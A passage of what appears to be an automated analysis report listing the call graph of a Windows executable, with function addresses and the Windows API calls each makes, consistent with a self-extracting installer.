24597->24599 24604 c6178d ___std_exception_copy 24597->24604 24601 c83e3e 22 API calls 24599->24601 24600 c61767 24609 c66ca7 75 API calls 24600->24609 24603 c617ce 24601->24603 24603->24607 24611 c66ca7 75 API calls 24603->24611 24604->24607 24610 c66ca7 75 API calls 24604->24610 24607->24583 24608->24600 24609->24597 24610->24607 24611->24607 24612->24588 24613->24590 24615 c6cf4d 24614->24615 24617 c6cf54 24614->24617 24619 c6981a 24615->24619 24617->24462 24618->24464 24620 c69833 24619->24620 24622 c69e80 79 API calls 24620->24622 24621 c69865 24621->24617 24622->24621 24624 c7de78 24623->24624 24625 c6e617 53 API calls 24624->24625 24626 c7de9b 24625->24626 24627 c64092 _swprintf 51 API calls 24626->24627 24628 c7dead 24627->24628 24629 c7d4d4 16 API calls 24628->24629 24630 c71b7c 24629->24630 24630->24418 24632 c619bf 24631->24632 24634 c619bb 24631->24634 24635 c618f6 24632->24635 24634->24471 24636 c61908 24635->24636 24637 c61945 24635->24637 24638 c63b2d 101 API calls 24636->24638 24643 c63fa3 24637->24643 24642 c61928 24638->24642 24642->24634 24646 c63fac 24643->24646 24644 c63b2d 101 API calls 24644->24646 24645 c61966 24645->24642 24648 c61e50 24645->24648 24646->24644 24646->24645 24660 c70e08 24646->24660 24649 c61e5a __EH_prolog 24648->24649 24668 c63bba 24649->24668 24651 c61e84 24652 c61732 78 API calls 24651->24652 24654 c61f0b 24651->24654 24653 c61e9b 24652->24653 24696 c618a9 78 API calls 24653->24696 24654->24642 24656 c61eb3 24658 c61ebf _wcslen 24656->24658 24697 c71b84 MultiByteToWideChar 24656->24697 24698 c618a9 78 API calls 24658->24698 24661 c70e0f 24660->24661 24662 c70e2a 24661->24662 24666 c66c31 RaiseException _com_raise_error 24661->24666 24664 c70e3b SetThreadExecutionState 24662->24664 24667 c66c31 RaiseException _com_raise_error 24662->24667 24664->24646 24666->24662 24667->24664 24669 c63bc4 __EH_prolog 24668->24669 24670 c63bf6 24669->24670 24671 c63bda 24669->24671 24673 c63e51 24670->24673 24676 c63c22 24670->24676 24724 c6138b 74 API calls 24671->24724 24741 c6138b 74 API calls 24673->24741 24675 c63be5 24675->24651 24676->24675 24699 c73377 24676->24699 24678 c63ca3 24679 c63d2e 24678->24679 24695 c63c9a 24678->24695 24727 c6d051 24678->24727 24709 c6ab1a 24679->24709 24680 c63c9f 24680->24678 24726 c620bd 78 API calls 24680->24726 24682 c63c71 24682->24678 24682->24680 24683 c63c8f 24682->24683 24725 c6138b 74 API calls 24683->24725 24687 c63d41 24689 c63dd7 24687->24689 24690 c63dc7 24687->24690 24733 c73020 123 API calls 24689->24733 24713 c69215 24690->24713 24693 c63dd5 24693->24695 24734 c62021 74 API calls 24693->24734 24735 c72297 24695->24735 24696->24656 24697->24658 24698->24654 24700 c7338c 24699->24700 24702 c73396 ___std_exception_copy 24699->24702 24742 c66ca7 75 API calls 24700->24742 24703 c734c6 24702->24703 24704 c7341c 24702->24704 24708 c73440 _abort 24702->24708 24744 c8238d RaiseException 24703->24744 24743 c732aa 75 API calls 3 library calls 24704->24743 24707 c734f2 24708->24682 24710 c6ab28 24709->24710 24712 c6ab32 24709->24712 24711 c7eb38 8 API calls 24710->24711 24711->24712 24712->24687 24714 c6921f __EH_prolog 24713->24714 24745 c67c64 24714->24745 24717 c613ba 78 API calls 24718 c69231 24717->24718 24748 c6d114 24718->24748 24720 c6928a 24720->24693 24722 c6d114 118 API calls 24723 c69243 24722->24723 24723->24720 24723->24722 24757 c6d300 97 API calls __InternalCxxFrameHandler 24723->24757 24724->24675 24725->24695 24726->24678 24728 c6d084 24727->24728 24729 c6d072 24727->24729 24759 c6603a 82 API calls 24728->24759 24758 c6603a 82 API calls 24729->24758 24732 c6d07c 24732->24679 24733->24693 24734->24695 24737 c722a1 24735->24737 24736 c722ba 24760 c70eed 86 API calls 24736->24760 24737->24736 24740 c722ce 24737->24740 24739 c722c1 24739->24740 24741->24675 24742->24702 24743->24708 24744->24707 24746 c6b146 GetVersionExW 24745->24746 24747 c67c69 24746->24747 24747->24717 24753 c6d12a __InternalCxxFrameHandler 24748->24753 24749 c6d29a 24750 c6d2ce 24749->24750 24751 c6d0cb 6 API calls 24749->24751 24752 c70e08 SetThreadExecutionState RaiseException 24750->24752 24751->24750 24755 c6d291 24752->24755 24753->24749 24754 c78c8d 103 API calls 24753->24754 24753->24755 24756 c6ac05 91 API calls 24753->24756 24754->24753 24755->24723 24756->24753 24757->24723 24758->24732 24759->24732 24760->24739 24761->24481 24762->24481 24763->24479 24765 c65d2a 24764->24765 24811 c65c4b 24765->24811 24767 c65d95 24767->24496 24768 c65d5d 24768->24767 24816 c6b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24768->24816 24771 c68186 24770->24771 24772 c68232 24771->24772 24823 c6be5e 19 API calls __InternalCxxFrameHandler 24771->24823 24822 c71fac CharUpperW 24772->24822 24775 c6823b 24775->24499 24777 c67c22 24776->24777 24778 c67c5a 24777->24778 24824 c66e7a 74 API calls 24777->24824 24778->24504 24780 c67c52 24825 c6138b 74 API calls 24780->24825 24782->24562 24784 c69db3 24783->24784 24786 c69dc2 24783->24786 24785 c69db9 FlushFileBuffers 24784->24785 24784->24786 24785->24786 24787 c69e3f SetFileTime 24786->24787 24787->24567 24788->24490 24789->24495 24790->24495 24791->24504 24792->24504 24793->24507 24794->24517 24795->24512 24796->24517 24798 c698c5 GetFileType 24797->24798 24799 c68b5a 24797->24799 24798->24799 24799->24532 24800 c62021 74 API calls 24799->24800 24800->24530 24801->24532 24802->24533 24803->24558 24804->24558 24805->24558 24806->24558 24807->24558 24808->24561 24809->24570 24810->24513 24817 c65b48 24811->24817 24813 c65c6c 24813->24768 24815 c65b48 2 API calls 24815->24813 24816->24768 24820 c65b52 24817->24820 24818 c65c3a 24818->24813 24818->24815 24820->24818 24821 c6b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24820->24821 24821->24820 24822->24775 24823->24772 24824->24780 24825->24778 24827 c6cef2 24826->24827 24832 c6a99e 86 API calls 24827->24832 24829 c6cf24 24833 c6a99e 86 API calls 24829->24833 24831 c6cf2f 24832->24829 24833->24831 24834->24578 24836 c6a6a8 24835->24836 24837 c6a727 FindNextFileW 24836->24837 24838 c6a6c1 FindFirstFileW 24836->24838 24839 c6a709 24837->24839 24840 c6a732 GetLastError 24837->24840 24838->24839 24841 c6a6d0 24838->24841 24839->24430 24840->24839 24842 c6bb03 GetCurrentDirectoryW 24841->24842 24843 c6a6e0 24842->24843 24844 c6a6e4 FindFirstFileW 24843->24844 24845 c6a6fe GetLastError 24843->24845 24844->24839 24844->24845 24845->24839 24855 c7a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24846->24855 24848 c7a5cd 24849 c7a5d9 24848->24849 24856 c7a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24848->24856 24849->24228 24849->24229 24851->24232 24852->24238 24853->24238 24854->24241 24855->24848 24856->24849 24857->24249 24859 c69f42 78 API calls 24858->24859 24860 c61fe8 24859->24860 24861 c61a04 101 API calls 24860->24861 24864 c62005 24860->24864 24862 c61ff5 24861->24862 24862->24864 24865 c6138b 74 API calls 24862->24865 24864->24257 24864->24258 24865->24864 24866 c613e1 84 API calls 2 library calls 25411 c794e0 GetClientRect 25412 c7f2e0 46 API calls __RTC_Initialize 25462 c721e0 26 API calls std::bad_exception::bad_exception 25413 c8bee0 GetCommandLineA GetCommandLineW 25464 c6f1e8 FreeLibrary 25415 c82cfb 38 API calls 4 library calls 25416 c65ef0 82 API calls 25465 c695f0 80 API calls 25466 c7fd4f 9 API calls 2 library calls 24882 c898f0 24890 c8adaf 24882->24890 24885 c89904 24887 c8990c 24888 c89919 24887->24888 24898 c89920 11 API calls 24887->24898 24891 c8ac98 _unexpected 5 API calls 24890->24891 24892 c8add6 24891->24892 24893 c8adee TlsAlloc 24892->24893 24894 c8addf 24892->24894 24893->24894 24895 c7fbbc _ValidateLocalCookies 5 API calls 24894->24895 24896 c898fa 24895->24896 24896->24885 24897 c89869 20 API calls 2 library calls 24896->24897 24897->24887 24898->24885 24899 c8abf0 24900 c8abfb 24899->24900 24902 c8ac24 24900->24902 24904 c8ac20 24900->24904 24905 c8af0a 24900->24905 24912 c8ac50 DeleteCriticalSection 24902->24912 24906 c8ac98 _unexpected 5 API calls 24905->24906 24907 c8af31 24906->24907 24908 c8af4f InitializeCriticalSectionAndSpinCount 24907->24908 24909 c8af3a 24907->24909 24908->24909 24910 c7fbbc _ValidateLocalCookies 5 API calls 24909->24910 24911 c8af66 24910->24911 24911->24900 24912->24904 25417 c888f0 7 API calls ___scrt_uninitialize_crt 25418 c7c793 102 API calls 4 library calls 25469 c79580 6 API calls 25471 c7b18d 78 API calls 25420 c7c793 97 API calls 4 library calls 25473 c7eda7 48 API calls _unexpected 25422 c7dca1 DialogBoxParamW 25475 c7f3a0 27 API calls 25425 c8a4a0 71 API calls _free 25426 c8a6a0 31 API calls 2 library calls 25427 c908a0 IsProcessorFeaturePresent 25476 c66faa 111 API calls 3 library calls 25477 c8b1b8 27 API calls 2 library calls 24950 c7f3b2 24951 c7f3be __FrameHandler3::FrameUnwindToState 24950->24951 24982 c7eed7 24951->24982 24953 c7f3c5 24954 c7f518 24953->24954 24957 c7f3ef 24953->24957 25055 c7f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24954->25055 24956 c7f51f 25048 c87f58 24956->25048 24968 c7f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24957->24968 24993 c88aed 24957->24993 24964 c7f40e 24966 c7f48f 25001 c7f953 GetStartupInfoW _abort 24966->25001 24968->24966 25051 c87af4 38 API calls 2 library calls 24968->25051 24969 c7f495 25002 c88a3e 51 API calls 24969->25002 24972 c7f49d 25003 c7df1e 24972->25003 24976 c7f4b1 24976->24956 24978 c7f4b5 24976->24978 24977 c7f4be 25054 c7f048 12 API calls ___scrt_uninitialize_crt 24977->25054 24978->24977 25053 c87efb 28 API calls _abort 24978->25053 24981 c7f4c6 24981->24964 24983 c7eee0 24982->24983 25057 c7f654 IsProcessorFeaturePresent 24983->25057 24985 c7eeec 25058 c82a5e 24985->25058 24987 c7eef1 24988 c7eef5 24987->24988 25066 c88977 24987->25066 24988->24953 24991 c7ef0c 24991->24953 24994 c88b04 24993->24994 24995 c7fbbc _ValidateLocalCookies 5 API calls 24994->24995 24996 c7f408 24995->24996 24996->24964 24997 c88a91 24996->24997 24999 c88ac0 24997->24999 24998 c7fbbc _ValidateLocalCookies 5 API calls 25000 c88ae9 24998->25000 24999->24998 25000->24968 25001->24969 25002->24972 25117 c70863 25003->25117 25007 c7df3d 25166 c7ac16 25007->25166 25009 c7df46 _abort 25010 c7df59 GetCommandLineW 25009->25010 25011 c7dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25010->25011 25012 c7df68 25010->25012 25013 c64092 _swprintf 51 API calls 25011->25013 25170 c7c5c4 25012->25170 25015 c7e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 25013->25015 25181 c7b6dd LoadBitmapW 25015->25181 25018 c7df76 OpenFileMappingW 25021 c7dfd6 CloseHandle 25018->25021 25022 c7df8f MapViewOfFile 25018->25022 25019 c7dfe0 25175 c7dbde 25019->25175 25021->25011 25025 c7dfa0 __InternalCxxFrameHandler 25022->25025 25026 c7dfcd UnmapViewOfFile 25022->25026 25030 c7dbde 2 API calls 25025->25030 25026->25021 25032 c7dfbc 25030->25032 25031 c790b7 8 API calls 25033 c7e0aa DialogBoxParamW 25031->25033 25032->25026 25034 c7e0e4 25033->25034 25035 c7e0f6 Sleep 25034->25035 25036 c7e0fd 25034->25036 25035->25036 25038 c7e10b 25036->25038 25211 c7ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 25036->25211 25039 c7e12a DeleteObject 25038->25039 25040 c7e146 25039->25040 25041 c7e13f DeleteObject 25039->25041 25042 c7e177 25040->25042 25043 c7e189 25040->25043 25041->25040 25212 c7dc3b 6 API calls 25042->25212 25208 c7ac7c 25043->25208 25045 c7e17d CloseHandle 25045->25043 25047 c7e1c3 25052 c7f993 GetModuleHandleW 25047->25052 25344 c87cd5 25048->25344 25051->24966 25052->24976 25053->24977 25054->24981 25055->24956 25057->24985 25070 c83b07 25058->25070 25061 c82a67 25061->24987 25063 c82a6f 25064 c82a7a 25063->25064 25084 c83b43 DeleteCriticalSection 25063->25084 25064->24987 25113 c8c05a 25066->25113 25069 c82a7d 7 API calls 2 library calls 25069->24988 25071 c83b10 25070->25071 25073 c83b39 25071->25073 25075 c82a63 25071->25075 25085 c83d46 25071->25085 25090 c83b43 DeleteCriticalSection 25073->25090 25075->25061 25076 c82b8c 25075->25076 25106 c83c57 25076->25106 25080 c82bbc 25080->25063 25081 c82baf 25081->25080 25112 c82bbf 6 API calls ___vcrt_FlsFree 25081->25112 25083 c82ba1 25083->25063 25084->25061 25091 c83c0d 25085->25091 25088 c83d7e InitializeCriticalSectionAndSpinCount 25089 c83d69 25088->25089 25089->25071 25090->25075 25092 c83c4f 25091->25092 25093 c83c26 25091->25093 25092->25088 25092->25089 25093->25092 25098 c83b72 25093->25098 25096 c83c3b GetProcAddress 25096->25092 25097 c83c49 25096->25097 25097->25092 25104 c83b7e ___vcrt_InitializeCriticalSectionEx 25098->25104 25099 c83bf3 25099->25092 25099->25096 25100 c83b95 LoadLibraryExW 25101 c83bfa 25100->25101 25102 c83bb3 GetLastError 25100->25102 25101->25099 25103 c83c02 FreeLibrary 25101->25103 25102->25104 25103->25099 25104->25099 25104->25100 25105 c83bd5 LoadLibraryExW 25104->25105 25105->25101 25105->25104 25107 c83c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 25106->25107 25108 c83c71 25107->25108 25109 c83c8a TlsAlloc 25108->25109 25110 c82b96 25108->25110 25110->25083 25111 c83d08 6 API calls ___vcrt_InitializeCriticalSectionEx 25110->25111 25111->25081 25112->25083 25114 c8c073 25113->25114 25115 c7fbbc _ValidateLocalCookies 5 API calls 25114->25115 25116 c7eefe 25115->25116 25116->24991 25116->25069 25118 c7ec50 25117->25118 25119 c7086d GetModuleHandleW 25118->25119 25120 c708e7 25119->25120 25121 c70888 GetProcAddress 25119->25121 25124 c70c14 GetModuleFileNameW 25120->25124 25222 c875fb 42 API calls 2 library calls 25120->25222 25122 c708a1 25121->25122 25123 c708b9 GetProcAddress 25121->25123 25122->25123 25125 c708cb 25123->25125 25133 c70c32 25124->25133 25125->25120 25127 c70b54 25127->25124 25128 c70b5f GetModuleFileNameW CreateFileW 25127->25128 25129 c70b8f SetFilePointer 25128->25129 25130 c70c08 CloseHandle 25128->25130 25129->25130 25131 c70b9d ReadFile 25129->25131 25130->25124 25131->25130 25135 c70bbb 25131->25135 25136 c70c94 GetFileAttributesW 25133->25136 25138 c70c5d CompareStringW 25133->25138 25139 c70cac 25133->25139 25213 c6b146 25133->25213 25216 c7081b 25133->25216 25135->25130 25137 c7081b 2 API calls 25135->25137 25136->25133 25136->25139 25137->25135 25138->25133 25140 c70cb7 25139->25140 25143 c70cec 25139->25143 25142 c70cd0 GetFileAttributesW 25140->25142 25144 c70ce8 25140->25144 25141 c70dfb 25165 c7a64d GetCurrentDirectoryW 25141->25165 25142->25140 25142->25144 25143->25141 25145 c6b146 GetVersionExW 25143->25145 25144->25143 25146 c70d06 25145->25146 25147 c70d73 25146->25147 25148 c70d0d 25146->25148 25149 c64092 _swprintf 51 API calls 25147->25149 25150 c7081b 2 API calls 25148->25150 25151 c70d9b AllocConsole 25149->25151 25152 c70d17 25150->25152 25153 c70df3 ExitProcess 25151->25153 25154 c70da8 GetCurrentProcessId AttachConsole 25151->25154 25155 c7081b 2 API calls 25152->25155 25223 c83e13 25154->25223 25157 c70d21 25155->25157 25158 c6e617 53 API calls 25157->25158 25160 c70d3c 25158->25160 25159 c70dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25159->25153 25161 c64092 _swprintf 51 API calls 25160->25161 25162 c70d4f 25161->25162 25163 c6e617 53 API calls 25162->25163 25164 c70d5e 25163->25164 25164->25153 25165->25007 25167 c7081b 2 API calls 25166->25167 25168 c7ac2a OleInitialize 25167->25168 25169 c7ac4d GdiplusStartup SHGetMalloc 25168->25169 25169->25009 25174 c7c5ce 25170->25174 25171 c7c6e4 25171->25018 25171->25019 25172 c71fac CharUpperW 25172->25174 25174->25171 25174->25172 25225 c6f3fa 82 API calls 2 library calls 25174->25225 25176 c7ec50 25175->25176 25177 c7dbeb SetEnvironmentVariableW 25176->25177 25179 c7dc0e 25177->25179 25178 c7dc36 25178->25011 25179->25178 25180 c7dc2a SetEnvironmentVariableW 25179->25180 25180->25178 25182 c7b6fe 25181->25182 25183 c7b70b GetObjectW 25181->25183 25226 c7a6c2 FindResourceW 25182->25226 25185 c7b71a 25183->25185 25187 c7a5c6 4 API calls 25185->25187 25188 c7b72d 25187->25188 25189 c7b770 25188->25189 25190 c7b74c 25188->25190 25192 c7a6c2 13 API calls 25188->25192 25200 c6da42 25189->25200 25242 c7a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25190->25242 25194 c7b73d 25192->25194 25193 c7b754 25243 c7a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25193->25243 25194->25190 25196 c7b743 DeleteObject 25194->25196 25196->25190 25197 c7b75d 25244 c7a80c 8 API calls 25197->25244 25199 c7b764 DeleteObject 25199->25189 25253 c6da67 25200->25253 25205 c790b7 25206 c7eb38 8 API calls 25205->25206 25207 c790d6 25206->25207 25207->25031 25209 c7acab GdiplusShutdown CoUninitialize 25208->25209 25209->25047 25211->25038 25212->25045 25214 c6b196 25213->25214 25215 c6b15a GetVersionExW 25213->25215 25214->25133 25215->25214 25217 c7ec50 25216->25217 25218 c70828 GetSystemDirectoryW 25217->25218 25219 c70840 25218->25219 25220 c7085e 25218->25220 25221 c70851 LoadLibraryW 25219->25221 25220->25133 25221->25220 25222->25127 25224 c83e1b 25223->25224 25224->25159 25224->25224 25225->25174 25227 c7a6e5 SizeofResource 25226->25227 25228 c7a7d3 25226->25228 25227->25228 25229 c7a6fc LoadResource 25227->25229 25228->25183 25228->25185 25229->25228 25230 c7a711 LockResource 25229->25230 25230->25228 25231 c7a722 GlobalAlloc 25230->25231 25231->25228 25232 c7a73d GlobalLock 25231->25232 25233 c7a7cc GlobalFree 25232->25233 25234 c7a74c __InternalCxxFrameHandler 25232->25234 25233->25228 25235 c7a754 CreateStreamOnHGlobal 25234->25235 25236 c7a7c5 GlobalUnlock 25235->25236 25237 c7a76c 25235->25237 25236->25233 25245 c7a626 GdipAlloc 25237->25245 25240 c7a7b0 25240->25236 25241 c7a79a GdipCreateHBITMAPFromBitmap 25241->25240 25242->25193 25243->25197 25244->25199 25246 c7a645 25245->25246 25247 c7a638 25245->25247 25246->25236 25246->25240 25246->25241 25249 c7a3b9 25247->25249 25250 c7a3e1 GdipCreateBitmapFromStream 25249->25250 25251 c7a3da GdipCreateBitmapFromStreamICM 25249->25251 25252 c7a3e6 25250->25252 25251->25252 25252->25246 25254 c6da75 __EH_prolog 25253->25254 25255 c6daa4 GetModuleFileNameW 25254->25255 25256 c6dad5 25254->25256 25257 c6dabe 25255->25257 25299 c698e0 25256->25299 25257->25256 25259 c6db31 25310 c86310 25259->25310 25260 c6959a 80 API calls 25262 c6da4e 25260->25262 25261 c6e261 78 API calls 25264 c6db05 25261->25264 25297 c6e29e GetModuleHandleW FindResourceW 25262->25297 25264->25259 25264->25261 25277 c6dd4a 25264->25277 25265 c6db44 25266 c86310 26 API calls 25265->25266 25274 c6db56 ___vcrt_InitializeCriticalSectionEx 25266->25274 25267 c6dc85 25267->25277 25330 c69d70 81 API calls 25267->25330 25269 c69e80 79 API calls 25269->25274 25271 c6dc9f ___std_exception_copy 25272 c69bd0 82 API calls 25271->25272 25271->25277 25275 c6dcc8 ___std_exception_copy 25272->25275 25274->25267 25274->25269 25274->25277 25324 c69bd0 25274->25324 25329 c69d70 81 API calls 25274->25329 25275->25277 25294 c6dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25275->25294 25331 c71b84 MultiByteToWideChar 25275->25331 25277->25260 25278 c6e159 25284 c6e1de 25278->25284 25337 c88cce 26 API calls 2 library calls 25278->25337 25280 c6e16e 25338 c87625 26 API calls 2 library calls 25280->25338 25282 c6e1c6 25339 c6e27c 78 API calls 25282->25339 25283 c6e214 25288 c86310 26 API calls 25283->25288 25284->25283 25287 c6e261 78 API calls 25284->25287 25287->25284 25289 c6e22d 25288->25289 25290 c86310 26 API calls 25289->25290 25290->25277 25292 c71da7 WideCharToMultiByte 25292->25294 25294->25277 25294->25278 25294->25292 25332 c6e5b1 50 API calls __vsnprintf 25294->25332 25333 c86159 26 API calls 3 library calls 25294->25333 25334 c88cce 26 API calls 2 library calls 25294->25334 25335 c87625 26 API calls 2 library calls 25294->25335 25336 c6e27c 78 API calls 25294->25336 25298 c6da55 25297->25298 25298->25205 25300 c698ea 25299->25300 25301 c6994b CreateFileW 25300->25301 25302 c6996c GetLastError 25301->25302 25306 c699bb 25301->25306 25303 c6bb03 GetCurrentDirectoryW 25302->25303 25304 c6998c 25303->25304 25305 c69990 CreateFileW GetLastError 25304->25305 25304->25306 25305->25306 25308 c699b5 25305->25308 25307 c699ff 25306->25307 25309 c699e5 SetFileTime 25306->25309 25307->25264 25308->25306 25309->25307 25311 c86349 25310->25311 25312 c8634d 25311->25312 25321 c86375 25311->25321 25340 c891a8 20 API calls __dosmaperr 25312->25340 25314 c86699 25316 c7fbbc _ValidateLocalCookies 5 API calls 25314->25316 25315 c86352 25341 c89087 26 API calls __cftof 25315->25341 25318 c866a6 25316->25318 25318->25265 25319 c8635d 25320 c7fbbc _ValidateLocalCookies 5 API calls 25319->25320 25322 c86369 25320->25322 25321->25314 25342 c86230 5 API calls _ValidateLocalCookies 25321->25342 25322->25265 25326 c69bdc 25324->25326 25328 c69be3 25324->25328 25325 c69785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25325->25328 25326->25274 25328->25325 25328->25326 25343 c66d1a 77 API calls 25328->25343 25329->25274 25330->25271 25331->25294 25332->25294 25333->25294 25334->25294 25335->25294 25336->25294 25337->25280 25338->25282 25339->25284 25340->25315 25341->25319 25342->25321 25343->25328 25345 c87ce1 _unexpected 25344->25345 25346 c87ce8 25345->25346 25347 c87cfa 25345->25347 25380 c87e2f GetModuleHandleW 25346->25380 25368 c8ac31 EnterCriticalSection 25347->25368 25350 c87ced 25350->25347 25381 c87e73 GetModuleHandleExW 25350->25381 25355 c87d01 25364 c87d76 25355->25364 25367 c87d9f 25355->25367 25389 c887e0 20 API calls _abort 25355->25389 25356 c87de8 25390 c92390 5 API calls _ValidateLocalCookies 25356->25390 25357 c87dbc 25372 c87dee 25357->25372 25360 c88a91 _abort 5 API calls 25366 c87d8e 25360->25366 25361 c88a91 _abort 5 API calls 25361->25367 25364->25360 25364->25366 25366->25361 25369 c87ddf 25367->25369 25368->25355 25391 c8ac81 LeaveCriticalSection 25369->25391 25371 c87db8 25371->25356 25371->25357 25392 c8b076 25372->25392 25375 c87e1c 25378 c87e73 _abort 8 API calls 25375->25378 25376 c87dfc GetPEB 25376->25375 25377 c87e0c GetCurrentProcess TerminateProcess 25376->25377 25377->25375 25379 c87e24 ExitProcess 25378->25379 25380->25350 25382 c87e9d GetProcAddress 25381->25382 25383 c87ec0 25381->25383 25384 c87eb2 25382->25384 25385 c87ecf 25383->25385 25386 c87ec6 FreeLibrary 25383->25386 25384->25383 25387 c7fbbc _ValidateLocalCookies 5 API calls 25385->25387 25386->25385 25388 c87cf9 25387->25388 25388->25347 25389->25364 25391->25371 25393 c8b09b 25392->25393 25397 c8b091 25392->25397 25394 c8ac98 _unexpected 5 API calls 25393->25394 25394->25397 25395 c7fbbc _ValidateLocalCookies 5 API calls 25396 c87df8 25395->25396 25396->25375 25396->25376 25397->25395 25478 c7b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25480 c71bbd GetCPInfo IsDBCSLeadByte 25430 c7a440 GdipCloneImage GdipAlloc 25431 c83a40 5 API calls _ValidateLocalCookies 25483 c91f40 CloseHandle 23616 c7e44b 23617 c7e3f4 23616->23617 23617->23616 23619 c7e85d 23617->23619 23645 c7e5bb 23619->23645 23621 c7e86d 23622 c7e8ca 23621->23622 23633 c7e8ee 23621->23633 23623 c7e7fb DloadReleaseSectionWriteAccess 6 API calls 23622->23623 23624 c7e8d5 RaiseException 23623->23624 23626 c7eac3 23624->23626 23625 c7e9d9 23632 c7ea37 GetProcAddress 23625->23632 23638 c7ea95 23625->23638 23626->23617 23627 c7e966 LoadLibraryExA 23628 c7e9c7 23627->23628 23629 c7e979 GetLastError 23627->23629 23628->23625 23630 c7e9d2 FreeLibrary 23628->23630 23631 c7e9a2 23629->23631 23642 c7e98c 23629->23642 23630->23625 23634 c7e7fb DloadReleaseSectionWriteAccess 6 API calls 23631->23634 23635 c7ea47 GetLastError 23632->23635 23632->23638 23633->23625 23633->23627 23633->23628 23633->23638 23636 c7e9ad RaiseException 23634->23636 23640 c7ea5a 23635->23640 23636->23626 23654 c7e7fb 23638->23654 23639 c7e7fb DloadReleaseSectionWriteAccess 6 API calls 23641 c7ea7b RaiseException 23639->23641 23640->23638 23640->23639 23643 c7e5bb ___delayLoadHelper2@8 6 API calls 23641->23643 23642->23628 23642->23631 23644 c7ea92 23643->23644 23644->23638 23646 c7e5c7 23645->23646 23647 c7e5ed 23645->23647 23662 c7e664 23646->23662 23647->23621 23649 c7e5cc 23650 c7e5e8 23649->23650 23665 c7e78d 23649->23665 23670 c7e5ee GetModuleHandleW GetProcAddress GetProcAddress 23650->23670 23653 c7e836 23653->23621 23655 c7e82f 23654->23655 23656 c7e80d 23654->23656 23655->23626 23657 c7e664 DloadReleaseSectionWriteAccess 3 API calls 23656->23657 23658 c7e812 23657->23658 23659 c7e82a 23658->23659 23660 c7e78d DloadProtectSection 3 API calls 23658->23660 23673 c7e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23659->23673 23660->23659 23671 c7e5ee GetModuleHandleW GetProcAddress GetProcAddress 23662->23671 23664 c7e669 23664->23649 23668 c7e7a2 DloadProtectSection 23665->23668 23666 c7e7a8 23666->23650 23667 c7e7dd VirtualProtect 23667->23666 23668->23666 23668->23667 23672 c7e6a3 VirtualQuery GetSystemInfo 23668->23672 23670->23653 23671->23664 23672->23667 23673->23655 25432 c7e455 14 API calls ___delayLoadHelper2@8 23711 c7cd58 23713 c7ce22 23711->23713 23718 c7cd7b 23711->23718 23727 c7c793 _wcslen _wcsrchr 23713->23727 23739 c7d78f 23713->23739 23715 c7d40a 23717 c71fbb CompareStringW 23717->23718 23718->23713 23718->23717 23719 c7ca67 SetWindowTextW 23719->23727 23724 c7c855 SetFileAttributesW 23725 c7c90f GetFileAttributesW 23724->23725 23737 c7c86f _abort _wcslen 23724->23737 23725->23727 23729 c7c921 DeleteFileW 23725->23729 23727->23715 23727->23719 23727->23724 23730 c7cc31 GetDlgItem SetWindowTextW SendMessageW 23727->23730 23733 c7cc71 SendMessageW 23727->23733 23738 c71fbb CompareStringW 23727->23738 23763 c7b314 23727->23763 23767 c7a64d GetCurrentDirectoryW 23727->23767 23769 c6a5d1 6 API calls 23727->23769 23770 c6a55a FindClose 23727->23770 23771 c7b48e 76 API calls 2 library calls 23727->23771 23772 c83e3e 23727->23772 23729->23727 23731 c7c932 23729->23731 23730->23727 23732 c64092 _swprintf 51 API calls 23731->23732 23734 c7c952 GetFileAttributesW 23732->23734 23733->23727 23734->23731 23735 c7c967 MoveFileW 23734->23735 23735->23727 23736 c7c97f MoveFileExW 23735->23736 23736->23727 23737->23725 23737->23727 23768 c6b991 51 API calls 2 library calls 23737->23768 23738->23727 23741 c7d799 _abort _wcslen 23739->23741 23740 c7d9e7 23740->23727 23741->23740 23742 c7d9c0 23741->23742 23747 c7d8a5 23741->23747 23788 c71fbb CompareStringW 23741->23788 23742->23740 23746 c7d9de ShowWindow 23742->23746 23746->23740 23785 c6a231 23747->23785 23748 c7d8d9 ShellExecuteExW 23748->23740 23753 c7d8ec 23748->23753 23750 c7d8d1 23750->23748 23751 c7d925 23790 c7dc3b 6 API calls 23751->23790 23752 c7d97b CloseHandle 23754 c7d989 23752->23754 23755 c7d994 23752->23755 23753->23751 23753->23752 23757 c7d91b ShowWindow 23753->23757 23791 c71fbb CompareStringW 23754->23791 23755->23742 23757->23751 23759 c7d93d 23759->23752 23760 c7d950 GetExitCodeProcess 23759->23760 23760->23752 23761 c7d963 23760->23761 23761->23752 23764 c7b31e 23763->23764 23765 c7b40d 23764->23765 23766 c7b3f0 ExpandEnvironmentStringsW 23764->23766 23765->23727 23766->23765 23767->23727 23768->23737 23769->23727 23770->23727 23771->23727 23773 c88e54 23772->23773 23774 c88e6c 23773->23774 23775 c88e61 23773->23775 23777 c88e7d _unexpected 23774->23777 23778 c88e74 23774->23778 23806 c88e06 23775->23806 23780 c88e82 23777->23780 23781 c88ea7 RtlReAllocateHeap 23777->23781 23814 c87a5e 7 API calls 2 library calls 23777->23814 23779 c88dcc _free 20 API calls 23778->23779 23782 c88e69 23779->23782 23813 c891a8 20 API calls __dosmaperr 23780->23813 23781->23777 23781->23782 23782->23727 23792 c6a243 23785->23792 23788->23747 23789 c6b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23789->23750 23790->23759 23791->23755 23800 c7ec50 23792->23800 23795 c6a261 23802 c6bb03 23795->23802 23796 c6a23a 23796->23748 23796->23789 23798 c6a275 23798->23796 23799 c6a279 